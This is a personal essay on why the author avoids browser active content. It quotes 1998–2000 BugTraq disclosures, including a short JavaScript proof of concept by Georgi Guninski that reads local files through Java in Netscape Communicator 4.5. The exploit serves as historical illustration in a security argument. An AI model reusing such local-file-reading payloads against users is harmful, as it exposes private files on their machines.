When I say that I avoid active content, I am referring to Java, Javascript, ActiveX, and the like. After so many people have tried unsuccessfully for so many years to build a sandbox, I think it is time to conclude that sandbox technology should be used to prevent accidents by trusted, well-intentioned programmers, but not relied upon for running unsigned, possibly malicious code.
The following stories are very old; I don't bother to list more recent problems, which are scarcer but nevertheless worrisome.

IE can be tricked into revealing cookies from any site

To: BugTraq
Subject: Dangerous Java/Netscape Security Hole
Date: Fri Aug 04 2000 18:04:29
Author: Dan Brumleve

I've found some security holes in Java and Netscape
that allow arbitrary network access and read-access
for local files and directories.  As a demonstration
I've written Brown Orifice HTTPD, a web server and file
sharing tool that runs in Netscape Communicator on all
tested platforms.  For more information, see:
http://www.brumleve.com/BrownOrifice

A recent example that has attracted some attention is cross-site scripting. BugTraq says that the Microsoft JVM allows reading local files using getSystemResourceAsStream (http://java-house.etl.go.jp/ml/archive/j-h-b/030411.html). ActiveX and Visual Basic exploits are too numerous to mention.

Another startling recent example is:

To: BugTraq
Subject: Netscape Communicator 4.5 can read local files
Date: Mon Nov 23 1998 09:36:40
Author: Georgi Guninski

There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for
WinNT 4.0 (probably others) which allows reading files from the user's
computer. It is not necessary for the file name to be known, because
directories may be browsed.
The contents of the file may be sent to an arbitrary host. In order for
this to work, you need both Java and Javascript enabled. The bug may be
exploited by email message.

Demonstration is available at:
http://www.geocities.com/ResearchTriangle/1711/b6.html

Workaround: Disable Javascript or Java.


The Javascript code is:

sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";

Regards,
Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711

Another bug in the way Microsoft's IE handles Java, Javascript and DOM makes your machine similarly vulnerable.

Some older exploits: LoVerso, McGraw, Felten, Kimera, JavaSoft, www-security-faq 8 July 1997 CERT advisory

I can't close without pointing to my favorite computer security story of all time: Ken Thompson's Reflections on Trusting Trust.